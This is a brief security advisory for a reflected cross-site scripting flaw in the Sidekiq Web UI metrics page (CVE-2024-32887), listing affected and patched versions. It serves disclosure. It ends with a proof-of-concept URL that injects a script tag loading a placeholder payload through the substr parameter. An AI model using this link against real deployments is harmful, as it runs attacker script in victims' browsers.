Reflected XSS in Metrics Web Page
Published: April 26, 2024
SECURITY IDENTIFIERS
- CVE: CVE-2024-32887 (NVD)
- GHSA: GHSA-q655-3pj8-9fxq
- Vendor Advisory: https://github.com/sidekiq/sidekiq/security/advisories/GHSA-q655-3pj8-9fxq
GEM
sidekiq
SEVERITY
CVSS v3.x: 5.5 (Medium)
UNAFFECTED VERSIONS
< 7.2.0
PATCHED VERSIONS
>= 7.2.4
DESCRIPTION
Reflected cross-site scripting (XSS) in the Sidekiq Web UI: the /metrics HTTP
endpoint reflects the value of the substr query parameter into the page, so a
crafted link such as the following executes attacker-controlled script in the
browser of any user who opens it:
https://{host}/sidekiq/metrics?substr=foot%22%3E%3Cscript%20src=%22{payload}%22%20/%3E
